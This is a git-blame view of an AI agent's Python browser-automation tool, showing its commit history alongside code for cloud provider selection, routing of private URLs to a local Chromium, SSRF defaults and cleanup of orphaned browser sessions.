and unrelated scope additions from the contributor's commit).
- Remove dead DEFAULT_SESSION_TIMEOUT and unregistered browser_close schema
- Fix _camofox_eval wrong call signatures (_ensure_tab, _post args)
- Cache _find_agent_browser, _get_command_timeout, _discover_homebrew_node_dirs
- Replace 5x subprocess scroll loop with single pixel-arg call
- URL-decode before secret exfiltration check (bypass prevention)
- Protect _recording_sessions with _cleanup_lock (thread safety)
- Return failure on empty stdout instead of silent success
- Structure-aware _truncate_snapshot (cut at line boundaries)
Follow-up improvements over contributor's original:
- Move _EMPTY_OK_COMMANDS to module-level frozenset (avoid per-call allocation)
- Fix list+tuple concat in _run_browser_command PATH construction
- Update test_browser_homebrew_paths.py for tuple returns and cache fixtures
Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com>
Closes #7168, closes #7171, closes #7172, closes #7173
2026-04-10 13:00:23 -07:00
_cached_agent_browser : Optional [ str ] = None
_agent_browser_resolved = False
2026-03-17 00:16:34 -07:00
def _get_cloud_provider ( ) - > Optional [ CloudBrowserProvider ] :
""" Return the configured cloud browser provider, or None for local mode.
2026-03-07 01:14:57 -08:00
2026-03-17 00:16:34 -07:00
Reads ` ` config [ " browser " ] [ " cloud_provider " ] ` ` once and caches the result
2026-03-26 15:27:27 -07:00
for the process lifetime . An explicit ` ` local ` ` provider disables cloud
fallback . If unset , fall back to Browserbase when direct or managed
Browserbase credentials are available .
2026-03-07 01:14:57 -08:00
"""
2026-03-17 00:16:34 -07:00
global _cached_cloud_provider , _cloud_provider_resolved
if _cloud_provider_resolved :
return _cached_cloud_provider
_cloud_provider_resolved = True
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
browser_cfg = cfg . get ( " browser " , { } )
provider_key = None
if isinstance ( browser_cfg , dict ) and " cloud_provider " in browser_cfg :
provider_key = normalize_browser_cloud_provider (
browser_cfg . get ( " cloud_provider " )
)
if provider_key == " local " :
_cached_cloud_provider = None
return None
if provider_key and provider_key in _PROVIDER_REGISTRY :
_cached_cloud_provider = _PROVIDER_REGISTRY [ provider_key ] ( )
2026-03-17 00:16:34 -07:00
except Exception as e :
logger . debug ( " Could not read cloud_provider from config: %s " , e )
2026-03-26 15:27:27 -07:00
if _cached_cloud_provider is None :
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
# Prefer Browser Use (managed Nous gateway or direct API key),
# fall back to Browserbase (direct credentials only).
fallback_provider = BrowserUseProvider ( )
2026-03-26 15:27:27 -07:00
if fallback_provider . is_configured ( ) :
_cached_cloud_provider = fallback_provider
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
else :
fallback_provider = BrowserbaseProvider ( )
if fallback_provider . is_configured ( ) :
_cached_cloud_provider = fallback_provider
2026-03-26 15:27:27 -07:00
2026-03-17 00:16:34 -07:00
return _cached_cloud_provider
2026-03-07 01:14:57 -08:00
2026-04-09 14:53:02 -07:00
from hermes_constants import is_termux as _is_termux_environment
2026-04-09 13:46:08 +02:00
def _browser_install_hint ( ) - > str :
if _is_termux_environment ( ) :
return " npm install -g agent-browser && agent-browser install "
return " npm install -g agent-browser && agent-browser install --with-deps "
2026-04-09 14:16:58 +02:00
def _requires_real_termux_browser_install ( browser_cmd : str ) - > bool :
return _is_termux_environment ( ) and _is_local_mode ( ) and browser_cmd . strip ( ) == " npx agent-browser "
def _termux_browser_install_error ( ) - > str :
return (
" Local browser automation on Termux cannot rely on the bare npx fallback. "
f " Install agent-browser explicitly first: { _browser_install_hint ( ) } "
)
2026-03-26 15:27:27 -07:00
def _is_local_mode ( ) - > bool :
""" Return True when the browser tool will use a local browser backend. """
if _get_cdp_override ( ) :
return False
return _get_cloud_provider ( ) is None
2026-03-31 10:40:13 -07:00
def _is_local_backend ( ) - > bool :
""" Return True when the browser runs locally (no cloud provider).
SSRF protection is only meaningful for cloud backends ( Browserbase ,
BrowserUse ) where the agent could reach internal resources on a remote
machine . For local backends — Camofox , or the built - in headless
Chromium without a cloud provider — the user already has full terminal
and network access on the same machine , so the check adds no security
value .
"""
return _is_camofox_mode ( ) or _get_cloud_provider ( ) is None
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
_auto_local_for_private_urls_resolved = False
_cached_auto_local_for_private_urls : bool = True
def _auto_local_for_private_urls ( ) - > bool :
""" Return whether a cloud-configured install should auto-spawn a local
Chromium for LAN / localhost URLs .
Reads ` ` browser . auto_local_for_private_urls ` ` once ( default ` ` True ` ` ) and
caches it for the process lifetime . When enabled , ` ` browser_navigate ` `
routes URLs whose host resolves to a private / loopback / LAN address to a
local headless Chromium sidecar even when a cloud provider ( Browserbase
/ Browser - Use / Firecrawl ) is configured globally . Public URLs continue
to use the cloud provider in the same conversation .
"""
global _auto_local_for_private_urls_resolved , _cached_auto_local_for_private_urls
if _auto_local_for_private_urls_resolved :
return _cached_auto_local_for_private_urls
_auto_local_for_private_urls_resolved = True
try :
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
browser_cfg = cfg . get ( " browser " , { } )
if isinstance ( browser_cfg , dict ) and " auto_local_for_private_urls " in browser_cfg :
_cached_auto_local_for_private_urls = bool (
browser_cfg . get ( " auto_local_for_private_urls " )
)
except Exception as e :
logger . debug ( " Could not read auto_local_for_private_urls from config: %s " , e )
return _cached_auto_local_for_private_urls
def _url_is_private ( url : str ) - > bool :
""" Return True when the URL ' s host resolves to a private/LAN/loopback address.
Reuses ` ` tools . url_safety . is_safe_url ` ` as the oracle — if the SSRF check
would reject the URL , we treat it as " private " for routing purposes . DNS
resolution failures are treated as NOT private ( fall through to whatever
backend is configured , which will surface the DNS error naturally ) .
"""
try :
from tools . url_safety import is_safe_url
# is_safe_url returns False for private/loopback/link-local/CGNAT AND
# for DNS failures. We only want the private-network case here, so
# we parse + check the host shape as a DNS-failure sieve first.
from urllib . parse import urlparse
import ipaddress
import socket
parsed = urlparse ( url )
hostname = ( parsed . hostname or " " ) . strip ( ) . lower ( ) . rstrip ( " . " )
if not hostname :
return False
# Literal IP → check directly
try :
ip = ipaddress . ip_address ( hostname )
return (
ip . is_private
or ip . is_loopback
or ip . is_link_local
or ip in ipaddress . ip_network ( " 100.64.0.0/10 " )
)
except ValueError :
pass
# Hostname — must resolve to confirm it's private (bare "localhost"
# resolves to 127.0.0.1 via /etc/hosts). Short-circuit on obvious
# names to avoid a DNS hop.
if hostname in ( " localhost " , ) or hostname . endswith ( " .localhost " ) :
return True
if hostname . endswith ( " .local " ) or hostname . endswith ( " .lan " ) or hostname . endswith ( " .internal " ) :
return True
try :
addr_info = socket . getaddrinfo ( hostname , None , socket . AF_UNSPEC , socket . SOCK_STREAM )
except socket . gaierror :
return False # DNS fail → not private, let the normal path fail
for _ , _ , _ , _ , sockaddr in addr_info :
try :
ip = ipaddress . ip_address ( sockaddr [ 0 ] )
except ValueError :
continue
if (
ip . is_private
or ip . is_loopback
or ip . is_link_local
or ip in ipaddress . ip_network ( " 100.64.0.0/10 " )
) :
return True
return False
except Exception as exc :
logger . debug ( " URL-privacy check failed for %s : %s " , url , exc )
return False
def _navigation_session_key ( task_id : str , url : str ) - > str :
""" Pick the session key that should handle ``url`` for ``task_id``.
Returns the bare task_id unless ALL of these are true :
1. A cloud provider is configured ( ` ` _get_cloud_provider ( ) ` ` is not None ) .
2. Auto - local routing is enabled ( ` ` browser . auto_local_for_private_urls ` ` ,
default True ) .
3. The URL resolves to a private / LAN / loopback address .
4. A CDP override is not active ( that path owns the whole session ) .
5. Camofox mode is not active ( Camofox is already local - only ) .
When all are true , returns ` ` f " { task_id } ::local " ` ` so the hybrid - routing
path spawns a local Chromium sidecar while the cloud session ( if any )
continues to serve public URLs .
"""
if task_id is None :
task_id = " default "
if _get_cdp_override ( ) :
return task_id
if _is_camofox_mode ( ) :
return task_id
if _get_cloud_provider ( ) is None :
return task_id
if not _auto_local_for_private_urls ( ) :
return task_id
if not _url_is_private ( url ) :
return task_id
return f " { task_id } { _LOCAL_SUFFIX } "
def _is_local_sidecar_key ( session_key : str ) - > bool :
""" Return True when ``session_key`` is a hybrid-routing local sidecar. """
return session_key . endswith ( _LOCAL_SUFFIX )
def _last_session_key ( task_id : str ) - > str :
""" Return the session key to use for a non-nav browser tool call.
If a previous ` ` browser_navigate ` ` on this task_id set a last - active key ,
use it so snapshot / click / fill / etc . hit the same session . Otherwise fall
back to the bare task_id ( matches original behavior for tasks that never
triggered hybrid routing ) .
"""
if task_id is None :
task_id = " default "
return _last_active_session_key . get ( task_id , task_id )
2026-03-31 11:11:55 +02:00
def _allow_private_urls ( ) - > bool :
""" Return whether the browser is allowed to navigate to private/internal addresses.
Reads ` ` config [ " browser " ] [ " allow_private_urls " ] ` ` once and caches the result
for the process lifetime . Defaults to ` ` False ` ` ( SSRF protection active ) .
"""
2026-03-31 03:16:40 -07:00
global _cached_allow_private_urls , _allow_private_urls_resolved
2026-03-31 11:11:55 +02:00
if _allow_private_urls_resolved :
2026-03-31 03:16:40 -07:00
return _cached_allow_private_urls
2026-03-31 11:11:55 +02:00
_allow_private_urls_resolved = True
2026-03-31 03:16:40 -07:00
_cached_allow_private_urls = False # safe default
2026-03-31 11:11:55 +02:00
try :
2026-04-07 17:28:04 -07:00
from hermes_cli . config import read_raw_config
cfg = read_raw_config ( )
2026-04-26 05:23:55 +03:00
browser_cfg = cfg . get ( " browser " , { } )
if isinstance ( browser_cfg , dict ) :
_cached_allow_private_urls = is_truthy_value (
browser_cfg . get ( " allow_private_urls " ) , default = False
)
2026-03-31 11:11:55 +02:00
except Exception as e :
logger . debug ( " Could not read allow_private_urls from config: %s " , e )
2026-03-31 03:16:40 -07:00
return _cached_allow_private_urls
2026-03-31 11:11:55 +02:00
2026-03-08 19:31:23 -07:00
def _socket_safe_tmpdir ( ) - > str :
""" Return a short temp directory path suitable for Unix domain sockets.
macOS sets ` ` TMPDIR ` ` to ` ` / var / folders / xx / . . . / T / ` ` ( ~ 51 chars ) . When we
append ` ` agent - browser - hermes_ … ` ` the resulting socket path exceeds the
104 - byte macOS limit for ` ` AF_UNIX ` ` addresses , causing agent - browser to
fail with " Failed to create socket directory " or silent screenshot failures .
Linux ` ` tempfile . gettempdir ( ) ` ` already returns ` ` / tmp ` ` , so this is a
no - op there . On macOS we bypass ` ` TMPDIR ` ` and use ` ` / tmp ` ` directly
( symlink to ` ` / private / tmp ` ` , sticky - bit protected , always available ) .
"""
if sys . platform == " darwin " :
return " /tmp "
return tempfile . gettempdir ( )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Track active sessions per "session key".
#
# A "session key" is either the bare task_id (cloud/default path) OR a composite
# like f"{task_id}::local" when the hybrid-routing feature spawns a local sidecar
# browser for a LAN/localhost URL while a cloud provider is configured globally.
# Both forms flow through the same _active_sessions / _run_browser_command /
# cleanup_browser code paths — the key is opaque to those internals.
#
2026-03-07 01:14:57 -08:00
# Stores: session_name (always), bb_session_id + cdp_url (cloud mode only)
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
_active_sessions : Dict [ str , Dict [ str , str ] ] = { } # session_key -> {session_name, ...}
_recording_sessions : set = set ( ) # session_keys with active recordings
# Tracks the most recent session_key used per task_id. Set by browser_navigate()
# after it chooses a backend for a URL; read by every non-nav browser tool
# (snapshot/click/fill/eval/...) so they target the session that served the last
# navigation. Without this, a task that navigated to localhost on the local
# sidecar would fall back to the cloud session on its next snapshot call.
_last_active_session_key : Dict [ str , str ] = { } # task_id -> session_key
_LOCAL_SUFFIX = " ::local "
2026-01-29 06:10:24 +00:00
# Flag to track if cleanup has been done
_cleanup_done = False
2026-01-31 21:42:15 -08:00
# =============================================================================
# Inactivity Timeout Configuration
# =============================================================================
# Session inactivity timeout (seconds) - cleanup if no activity for this long
2026-02-21 00:44:25 -08:00
# Default: 5 minutes. Needs headroom for LLM reasoning between browser commands,
# especially when subagents are doing multi-step browser tasks.
2026-03-14 11:34:31 -07:00
BROWSER_SESSION_INACTIVITY_TIMEOUT = int ( os . environ . get ( " BROWSER_INACTIVITY_TIMEOUT " , " 300 " ) )
2026-01-31 21:42:15 -08:00
# Track last activity time per session
_session_last_activity : Dict [ str , float ] = { }
# Background cleanup thread state
_cleanup_thread = None
_cleanup_running = False
2026-02-21 00:44:25 -08:00
# Protects _session_last_activity AND _active_sessions for thread safety
# (subagents run concurrently via ThreadPoolExecutor)
2026-01-31 21:42:15 -08:00
_cleanup_lock = threading . Lock ( )
2026-01-29 06:10:24 +00:00
def _emergency_cleanup_all_sessions ( ) :
"""
Emergency cleanup of all active browser sessions .
Called on process exit or interrupt to prevent orphaned sessions .
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
Also runs the orphan reaper to clean up daemons left behind by previously
crashed hermes processes — this way every clean hermes exit sweeps
accumulated orphans , not just ones that actively used the browser tool .
2026-01-29 06:10:24 +00:00
"""
global _cleanup_done
if _cleanup_done :
return
_cleanup_done = True
2026-03-07 01:14:57 -08:00
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
# Clean up this process's own sessions first, so their owner_pid files
# are removed before the reaper scans.
if _active_sessions :
logger . info ( " Emergency cleanup: closing %s active session(s)... " ,
len ( _active_sessions ) )
try :
cleanup_all_browsers ( )
except Exception as e :
logger . error ( " Emergency cleanup error: %s " , e )
finally :
with _cleanup_lock :
_active_sessions . clear ( )
_session_last_activity . clear ( )
_recording_sessions . clear ( )
# Sweep orphans from other crashed hermes processes. Safe even if we
# never used the browser — uses owner_pid liveness to avoid reaping
# daemons owned by other live hermes processes.
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
try :
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
- Zero subprocesses; regression test asserts subprocess/Popen/time.sleep
never appear in the function source (skipping docstrings via AST).
## Validation
| | Before | After |
|------------------------------|---------------|--------------|
| Orphan agent-browser daemons | 18 accumulated| 2 (live) |
| paste.rs sleep interpreters | 15 accumulated| 0 |
| RSS reclaimed | - | ~2.7 GB |
| Targeted tests | - | 2253 pass |
E2E verified: alive-owner daemons NOT reaped; dead-owner daemons
SIGTERM'd and socket dirs cleaned; pending.json sweep deletes expired
entries without spawning subprocesses.
2026-04-17 18:46:30 -07:00
_reap_orphaned_browser_sessions ( )
2026-01-29 06:10:24 +00:00
except Exception as e :
fix: two process leaks (agent-browser daemons, paste.rs sleepers) (#11843)
Both fixes close process leaks observed in production (18+ orphaned
agent-browser node daemons, 15+ orphaned paste.rs sleep interpreters
accumulated over ~3 days, ~2.7 GB RSS).
## agent-browser daemon leak
Previously the orphan reaper (_reap_orphaned_browser_sessions) only ran
from _start_browser_cleanup_thread, which is only invoked on the first
browser tool call in a process. Hermes sessions that never used the
browser never swept orphans, and the cross-process orphan detection
relied on in-process _active_sessions, which doesn't see other hermes
PIDs' sessions (race risk).
- Write <session>.owner_pid alongside the socket dir recording the
hermes PID that owns the daemon (extracted into _write_owner_pid for
direct testability).
- Reaper prefers owner_pid liveness over in-process _active_sessions.
Cross-process safe: concurrent hermes instances won't reap each
other's daemons. Legacy tracked_names fallback kept for daemons
that predate owner_pid.
- atexit handler (_emergency_cleanup_all_sessions) now always runs
the reaper, not just when this process had active sessions —
every clean hermes exit sweeps accumulated orphans.
## paste.rs auto-delete leak
_schedule_auto_delete spawned a detached Python subprocess per call
that slept 6 hours then issued DELETE requests. No dedup, no tracking —
every 'hermes debug share' invocation added ~20 MB of resident Python
interpreters that stuck around until the sleep finished.
- Replaced the spawn with ~/.hermes/pastes/pending.json: records
{url, expire_at} entries.
- _sweep_expired_pastes() synchronously DELETEs past-due entries on
every 'hermes debug' invocation (run_debug() dispatcher).
- Network failures stay in pending.json for up to 24h, then give up
(paste.rs's own retention handles the 'user never runs hermes again'
edge case).
